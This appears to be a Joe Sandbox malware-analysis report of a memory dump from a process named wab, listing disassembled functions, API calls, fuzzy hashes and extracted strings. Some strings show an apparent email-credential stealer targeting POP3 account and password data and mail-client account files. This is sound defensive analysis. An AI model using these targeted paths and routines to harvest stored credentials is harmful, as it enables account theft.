                                • Opcode Fuzzy Hash: bd1cd8ee8225a3ff3634a39525aae2a9e7b43bc3e69347b773f6761d96e38ad8
                                • Instruction Fuzzy Hash: 78310A79900129EFDB159F78CC84EEB7BBDDB46304F1001ACE959D7251E6319F458BA0
                                APIs
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                 • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: HeapProcess
                                • String ID:
                                • API String ID: 54951025-0
                                • Opcode ID: 5395e886374af18254cfbf35d1f6170799d71c5f5c624fa691df782c99529b0f
                                • Instruction ID: 55b23ee5d0f9070b0251f6c63c06e8d3b450914e9ed9def3f3013de070ea66ae
                                • Opcode Fuzzy Hash: 5395e886374af18254cfbf35d1f6170799d71c5f5c624fa691df782c99529b0f
                                • Instruction Fuzzy Hash: 61A011382802038F8B088E30A30E20E3AACAA202C030000A8A80AC0000EB2A88008B0A

                                 Control-flow Graph
                                 (rendered graph not reproduced; entry block 21cb173a-21cb17fe)
                                APIs
                                  • Part of subcall function 21CB1CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 21CB1D1B
                                  • Part of subcall function 21CB1CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 21CB1D37
                                  • Part of subcall function 21CB1CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21CB1D4B
                                • _strlen.LIBCMT ref: 21CB1855
                                • _strlen.LIBCMT ref: 21CB1869
                                • _strlen.LIBCMT ref: 21CB188B
                                • _strlen.LIBCMT ref: 21CB18AE
                                • _strlen.LIBCMT ref: 21CB18C8
                                Strings
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                 • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: _strlen$File$CopyCreateDelete
                                • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                • API String ID: 3296212668-3023110444
                                • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                • Instruction ID: d5c06f05fa647ff1eb03bb8a65f0df63a93441f9f0d67db1151da75b8e4c633d
                                • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                • Instruction Fuzzy Hash: EA61D179D04299EEEF158BE4E880BDEBBB9AF16300F00415AD204E7394EB745B46CB56

                                Control-flow Graph

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                 • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: _strlen
                                • String ID: %m$~$Gon~$~F@7$~dra
                                • API String ID: 4218353326-230879103
                                • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                • Instruction ID: 7db631e2363650d4c16acb1018c5f6571377cb66e293bed7df884c003936b60b
                                • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                • Instruction Fuzzy Hash: 3F7107B9D042699FDF119BF49894ADF7BFC9F19300F10409AE644D7241E678AB85CBA0

                                 Control-flow Graph
                                 (rendered graph not reproduced; entry block 21cb7cc2-21cb7cd6)
                                APIs
                                • ___free_lconv_mon.LIBCMT ref: 21CB7D06
                                  • Part of subcall function 21CB90BA: _free.LIBCMT ref: 21CB90D7
                                  • Part of subcall function 21CB90BA: _free.LIBCMT ref: 21CB90E9
                                  • Part of subcall function 21CB90BA: _free.LIBCMT ref: 21CB90FB
                                  • Part of subcall function 21CB90BA: _free.LIBCMT ref: 21CB910D
                                  • Part of subcall function 21CB90BA: _free.LIBCMT ref: 21CB911F
                                  • Part of subcall function 21CB90BA: _free.LIBCMT ref: 21CB9131
                                  • Part of subcall function 21CB90BA: _free.LIBCMT ref: 21CB9143
                                  • Part of subcall function 21CB90BA: _free.LIBCMT ref: 21CB9155
                                  • Part of subcall function 21CB90BA: _free.LIBCMT ref: 21CB9167
                                  • Part of subcall function 21CB90BA: _free.LIBCMT ref: 21CB9179
                                  • Part of subcall function 21CB90BA: _free.LIBCMT ref: 21CB918B
                                  • Part of subcall function 21CB90BA: _free.LIBCMT ref: 21CB919D
                                  • Part of subcall function 21CB90BA: _free.LIBCMT ref: 21CB91AF
                                • _free.LIBCMT ref: 21CB7CFB
                                  • Part of subcall function 21CB571E: HeapFree.KERNEL32(00000000,00000000,?,21CB924F,?,00000000,?,00000000,?,21CB9276,?,00000007,?,?,21CB7E5A,?), ref: 21CB5734
                                  • Part of subcall function 21CB571E: GetLastError.KERNEL32(?,?,21CB924F,?,00000000,?,00000000,?,21CB9276,?,00000007,?,?,21CB7E5A,?,?), ref: 21CB5746
                                • _free.LIBCMT ref: 21CB7D1D
                                • _free.LIBCMT ref: 21CB7D32
                                • _free.LIBCMT ref: 21CB7D3D
                                • _free.LIBCMT ref: 21CB7D5F
                                • _free.LIBCMT ref: 21CB7D72
                                • _free.LIBCMT ref: 21CB7D80
                                • _free.LIBCMT ref: 21CB7D8B
                                • _free.LIBCMT ref: 21CB7DC3
                                • _free.LIBCMT ref: 21CB7DCA
                                • _free.LIBCMT ref: 21CB7DE7
                                • _free.LIBCMT ref: 21CB7DFF
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                 • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                • String ID:
                                • API String ID: 161543041-0
                                • Opcode ID: 62ed39971007622f7edd882895c127e5908f3b25f626a22d9891a8c0ab1f488b
                                • Instruction ID: fac40e13730d4d2280b88dfb416bb17f5bc8ad350b62f78f8c70ee0ba3f87552
                                • Opcode Fuzzy Hash: 62ed39971007622f7edd882895c127e5908f3b25f626a22d9891a8c0ab1f488b
                                • Instruction Fuzzy Hash: 7E316D7A610306DFEB219B78D944B667BE9EF05390F10446DE848E7191DE31EB80CB11

                                Control-flow Graph

                                APIs
                                • _free.LIBCMT ref: 21CB59EA
                                  • Part of subcall function 21CB571E: HeapFree.KERNEL32(00000000,00000000,?,21CB924F,?,00000000,?,00000000,?,21CB9276,?,00000007,?,?,21CB7E5A,?), ref: 21CB5734
                                  • Part of subcall function 21CB571E: GetLastError.KERNEL32(?,?,21CB924F,?,00000000,?,00000000,?,21CB9276,?,00000007,?,?,21CB7E5A,?,?), ref: 21CB5746
                                • _free.LIBCMT ref: 21CB59F6
                                • _free.LIBCMT ref: 21CB5A01
                                • _free.LIBCMT ref: 21CB5A0C
                                • _free.LIBCMT ref: 21CB5A17
                                • _free.LIBCMT ref: 21CB5A22
                                • _free.LIBCMT ref: 21CB5A2D
                                • _free.LIBCMT ref: 21CB5A38
                                • _free.LIBCMT ref: 21CB5A43
                                • _free.LIBCMT ref: 21CB5A51
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                 • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 22c35cb3ce4be06c85d471785254ddf489bd08dda78cfaf94e97908156e54ae1
                                • Instruction ID: b66c076f3e30fb9c0b84fd87f45fd9d7bd6c3d7bb7cbc0ee10ede9545af7a9b0
                                • Opcode Fuzzy Hash: 22c35cb3ce4be06c85d471785254ddf489bd08dda78cfaf94e97908156e54ae1
                                • Instruction Fuzzy Hash: 5611807E660149FFCB11DF94D881CDD3FA9EF18350B5581A5BA08EF225DA32EB509B80

                                Control-flow Graph

                                APIs
                                • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 21CB1D1B
                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 21CB1D37
                                • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21CB1D4B
                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21CB1D58
                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21CB1D72
                                • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21CB1D7D
                                • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21CB1D8A
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                 • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                • String ID:
                                • API String ID: 1454806937-0
                                • Opcode ID: 5d21d677136c5972efccf98f0a29010647a39a334bd3e438e46e40286203eb1d
                                • Instruction ID: ed03ed8c2ad09ac0ce895af6a7778401f147325d10ae79a71551907da2ac73bf
                                • Opcode Fuzzy Hash: 5d21d677136c5972efccf98f0a29010647a39a334bd3e438e46e40286203eb1d
                                • Instruction Fuzzy Hash: 282160B998121CFFEB159BB09CCCEEB76ACEB28388F000965F512D2140D6749F458B70

                                 Control-flow Graph
                                 (rendered graph not reproduced; entry block 21cb9492-21cb94ef, GetConsoleCP)
                                APIs
                                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,21CB9C07,?,00000000,?,00000000,00000000), ref: 21CB94D4
                                • __fassign.LIBCMT ref: 21CB954F
                                • __fassign.LIBCMT ref: 21CB956A
                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 21CB9590
                                • WriteFile.KERNEL32(?,?,00000000,21CB9C07,00000000,?,?,?,?,?,?,?,?,?,21CB9C07,?), ref: 21CB95AF
                                • WriteFile.KERNEL32(?,?,00000001,21CB9C07,00000000,?,?,?,?,?,?,?,?,?,21CB9C07,?), ref: 21CB95E8
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                 • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                • String ID:
                                • API String ID: 1324828854-0
                                • Opcode ID: 4ed5f46a6686d5e4d6a7f532015b7494d0594c2d89f23e049788402e5c858e41
                                • Instruction ID: 8a465b52a0d8f637dd2b32562dcb314a736dfa9e994053d647c5fcbe2ac6a5ee
                                • Opcode Fuzzy Hash: 4ed5f46a6686d5e4d6a7f532015b7494d0594c2d89f23e049788402e5c858e41
                                • Instruction Fuzzy Hash: C651D3B9D40209EFDB04CFA8D895BEEBBF8EF19310F10415AE956E7281D7309A41CB60

                                 Control-flow Graph
                                 (rendered graph not reproduced; entry block 21cb3370-21cb33b5)
                                APIs
                                • _ValidateLocalCookies.LIBCMT ref: 21CB339B
                                • ___except_validate_context_record.LIBVCRUNTIME ref: 21CB33A3
                                • _ValidateLocalCookies.LIBCMT ref: 21CB3431
                                • __IsNonwritableInCurrentImage.LIBCMT ref: 21CB345C
                                • _ValidateLocalCookies.LIBCMT ref: 21CB34B1
                                Strings
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                 • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                • String ID: csm
                                • API String ID: 1170836740-1018135373
                                • Opcode ID: 55f95dd93746db4d6bc79a41d0b472b8cb9b02996ea61db2ae88cd5f5a387b9a
                                • Instruction ID: 9ca1cd263ac0a4e96d8c3d2625664cc2ce341e8aed4f42a3abc772512ccbd937
                                • Opcode Fuzzy Hash: 55f95dd93746db4d6bc79a41d0b472b8cb9b02996ea61db2ae88cd5f5a387b9a
                                • Instruction Fuzzy Hash: 3D418B3CA00209EBCB01CF69C884A9FBFA5AF56724F149169E915EB291D7399B05CF90

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 21CB9221: _free.LIBCMT ref: 21CB924A
                                • _free.LIBCMT ref: 21CB92AB
                                  • Part of subcall function 21CB571E: HeapFree.KERNEL32(00000000,00000000,?,21CB924F,?,00000000,?,00000000,?,21CB9276,?,00000007,?,?,21CB7E5A,?), ref: 21CB5734
                                  • Part of subcall function 21CB571E: GetLastError.KERNEL32(?,?,21CB924F,?,00000000,?,00000000,?,21CB9276,?,00000007,?,?,21CB7E5A,?,?), ref: 21CB5746
                                • _free.LIBCMT ref: 21CB92B6
                                • _free.LIBCMT ref: 21CB92C1
                                • _free.LIBCMT ref: 21CB9315
                                • _free.LIBCMT ref: 21CB9320
                                • _free.LIBCMT ref: 21CB932B
                                • _free.LIBCMT ref: 21CB9336
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                 • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                • Instruction ID: bafea68fd02df61feebc50186cede018f0f7eff718b232da3eb1aca45d3c7665
                                • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                • Instruction Fuzzy Hash: E01193B5A90B09FED620AFF0DC45FCB7B9D9F14700F408824A699F6052DA34B7044753
                                APIs
                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,21CB6FFD,00000000,?,?,?,21CB8A72,?,?,00000100), ref: 21CB887B
                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,21CB8A72,?,?,00000100,5EFC4D8B,?,?), ref: 21CB8901
                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 21CB89FB
                                • __freea.LIBCMT ref: 21CB8A08
                                  • Part of subcall function 21CB56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 21CB5702
                                • __freea.LIBCMT ref: 21CB8A11
                                • __freea.LIBCMT ref: 21CB8A36
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                 • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                • String ID:
                                • API String ID: 1414292761-0
                                • Opcode ID: 502e622f225e21dcbb4c15da239b17f6df81790f3cfb1d181d0f7e4260a4f1cd
                                • Instruction ID: 981b1977aa4ffc58f7d8ff03491d5f807a5bd5a9ec31cda8c53edadcc8ccc86b
                                • Opcode Fuzzy Hash: 502e622f225e21dcbb4c15da239b17f6df81790f3cfb1d181d0f7e4260a4f1cd
                                • Instruction Fuzzy Hash: 3051F17AA14216EFEB158E60DC82FAF7BA9EB51754F10463CFD04D6180EB35EE5087A0
                                APIs
                                • _strlen.LIBCMT ref: 21CB1607
                                • _strcat.LIBCMT ref: 21CB161D
                                • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,21CB190E,?,?,00000000,?,00000000), ref: 21CB1643
                                • lstrcatW.KERNEL32(?,?), ref: 21CB165A
                                • lstrlenW.KERNEL32(?,?,?,?,?,21CB190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 21CB1661
                                • lstrcatW.KERNEL32(00001008,?), ref: 21CB1686
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                 • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: lstrcatlstrlen$_strcat_strlen
                                • String ID:
                                • API String ID: 1922816806-0
                                • Opcode ID: f4d11b16266ddebe7be8575c3e496d68cd81fd292635ea953ea3aace8fa1c331
                                • Instruction ID: 2c5a24767e14d21c7223ed345ee6b617e5f75f7b8779e3e8e2624b53bf7fa8d4
                                • Opcode Fuzzy Hash: f4d11b16266ddebe7be8575c3e496d68cd81fd292635ea953ea3aace8fa1c331
                                • Instruction Fuzzy Hash: 2421DA3A900205EFD705DF94EC84EFE77B8EF98710F14442AE505EB241DB34A74587A5
                                APIs
                                • lstrcatW.KERNEL32(?,?), ref: 21CB1038
                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 21CB104B
                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 21CB1061
                                • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 21CB1075
                                • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 21CB1090
                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 21CB10B8
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: lstrlen$AttributesFilelstrcat
                                • String ID:
                                • API String ID: 3594823470-0
                                • Opcode ID: b34c0ed97fd74fc2ebd5ece9b69dccbcf3a8cf36ae839f6f116d7a99571586bb
                                • Instruction ID: ba21050ee170a61586aeaee9699da85635b7bb5c8c8dc22138894fdb280efa70
                                • Opcode Fuzzy Hash: b34c0ed97fd74fc2ebd5ece9b69dccbcf3a8cf36ae839f6f116d7a99571586bb
                                • Instruction Fuzzy Hash: 1B217F3AA00219DBCF149BA0FC4CEDB376CEF44324F104296E959D72A1DA319B85CB40
                                APIs
                                • GetLastError.KERNEL32(?,?,21CB3518,21CB23F1,21CB1F17), ref: 21CB3864
                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 21CB3872
                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 21CB388B
                                • SetLastError.KERNEL32(00000000,?,21CB3518,21CB23F1,21CB1F17), ref: 21CB38DD
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: ErrorLastValue___vcrt_
                                • String ID:
                                • API String ID: 3852720340-0
                                • Opcode ID: 0c1704b523a1494f687bc7bf7454d24950d1167ec6c9c19e38f251aa778f3a57
                                • Instruction ID: 43978e4fa9852bda116564e19cf4760ebf76f5eb292b0489da9116f6916152be
                                • Opcode Fuzzy Hash: 0c1704b523a1494f687bc7bf7454d24950d1167ec6c9c19e38f251aa778f3a57
                                • Instruction Fuzzy Hash: 6201D43F649722EEA206167A7C889572B94DB36775720223FE111D90D1EF274A018349
                                APIs
                                • GetLastError.KERNEL32(?,?,21CB6C6C), ref: 21CB5AFA
                                • _free.LIBCMT ref: 21CB5B2D
                                • _free.LIBCMT ref: 21CB5B55
                                • SetLastError.KERNEL32(00000000,?,?,21CB6C6C), ref: 21CB5B62
                                • SetLastError.KERNEL32(00000000,?,?,21CB6C6C), ref: 21CB5B6E
                                • _abort.LIBCMT ref: 21CB5B74
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: ErrorLast$_free$_abort
                                • String ID:
                                • API String ID: 3160817290-0
                                • Opcode ID: 13ea42445a4cef37667cb559476e1b51eeb18c85a721ca4c86b605e539e5e880
                                • Instruction ID: 2e1f59d14322c2681837765d6863c63aa14c063b57cc5c57d45d25e32232cd0e
                                • Opcode Fuzzy Hash: 13ea42445a4cef37667cb559476e1b51eeb18c85a721ca4c86b605e539e5e880
                                • Instruction Fuzzy Hash: 83F0C23E684502EED24626357C08E1F2E6A9FF6BB1B240124F915E65C0FE298B028A64
                                APIs
                                  • Part of subcall function 21CB1E89: lstrlenW.KERNEL32(?,?,?,?,?,21CB10DF,?,?,?,00000000), ref: 21CB1E9A
                                  • Part of subcall function 21CB1E89: lstrcatW.KERNEL32(?,?), ref: 21CB1EAC
                                  • Part of subcall function 21CB1E89: lstrlenW.KERNEL32(?,?,21CB10DF,?,?,?,00000000), ref: 21CB1EB3
                                  • Part of subcall function 21CB1E89: lstrlenW.KERNEL32(?,?,21CB10DF,?,?,?,00000000), ref: 21CB1EC8
                                  • Part of subcall function 21CB1E89: lstrcatW.KERNEL32(?,21CB10DF), ref: 21CB1ED3
                                • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 21CB122A
                                  • Part of subcall function 21CB173A: _strlen.LIBCMT ref: 21CB1855
                                  • Part of subcall function 21CB173A: _strlen.LIBCMT ref: 21CB1869
                                Strings
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                • API String ID: 4036392271-1520055953
                                • Opcode ID: 278616c6eeefa3913ede2c4fd7dd2e0bc37b9fd9ff26c4ef5210e6f10de2fcde
                                • Instruction ID: 606c944f7459f1105ee69533623b44bc4bed075b0e5f4932161436d78d0e2b43
                                • Opcode Fuzzy Hash: 278616c6eeefa3913ede2c4fd7dd2e0bc37b9fd9ff26c4ef5210e6f10de2fcde
                                • Instruction Fuzzy Hash: A321A7BDE10248EAEB1097D1EC91FEE7339EF50B15F000556F604EB2D4E6B16E818759
                                APIs
                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,21CB4AEA,?,?,21CB4A8A,?,21CC2238,0000000C,21CB4BBD,00000000,00000000), ref: 21CB4B59
                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 21CB4B6C
                                • FreeLibrary.KERNEL32(00000000,?,?,?,21CB4AEA,?,?,21CB4A8A,?,21CC2238,0000000C,21CB4BBD,00000000,00000000,00000001,21CB2082), ref: 21CB4B8F
                                Strings
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: AddressFreeHandleLibraryModuleProc
                                • String ID: CorExitProcess$mscoree.dll
                                • API String ID: 4061214504-1276376045
                                • Opcode ID: f613bc552ee70421a33aa8f379400a465f9d62ccde19f89f342227eb2acb213e
                                • Instruction ID: a59c6a253c5337f1c8b065c3d5d6fcd18064eeb781226b61f53f0bc243bfbc20
                                • Opcode Fuzzy Hash: f613bc552ee70421a33aa8f379400a465f9d62ccde19f89f342227eb2acb213e
                                • Instruction Fuzzy Hash: 32F08C39940208EFDB059F90D80CFAEBFB9EF14396F0001A8EA07E2150DB369B41CB90
                                APIs
                                • GetEnvironmentStringsW.KERNEL32 ref: 21CB715C
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 21CB717F
                                  • Part of subcall function 21CB56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 21CB5702
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 21CB71A5
                                • _free.LIBCMT ref: 21CB71B8
                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 21CB71C7
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                • String ID:
                                • API String ID: 336800556-0
                                • Opcode ID: e5229783c8666357ee149fb5482911835264a1aa6341d28606f7fb47972db87b
                                • Instruction ID: 5c9dccfc6170ada85dc5796d1aaaa2445eb88e7cb8b196754eadfc9be988d6c8
                                • Opcode Fuzzy Hash: e5229783c8666357ee149fb5482911835264a1aa6341d28606f7fb47972db87b
                                • Instruction Fuzzy Hash: CF01847E602315FF27110AF65C8CD7B6E6EDBD7AA4310017DBE08D7280EA658E0282B1
                                APIs
                                • GetLastError.KERNEL32(00000000,?,00000000,21CB636D,21CB5713,00000000,?,21CB2249,?,?,21CB1D66,00000000,?,?,00000000), ref: 21CB5B7F
                                • _free.LIBCMT ref: 21CB5BB4
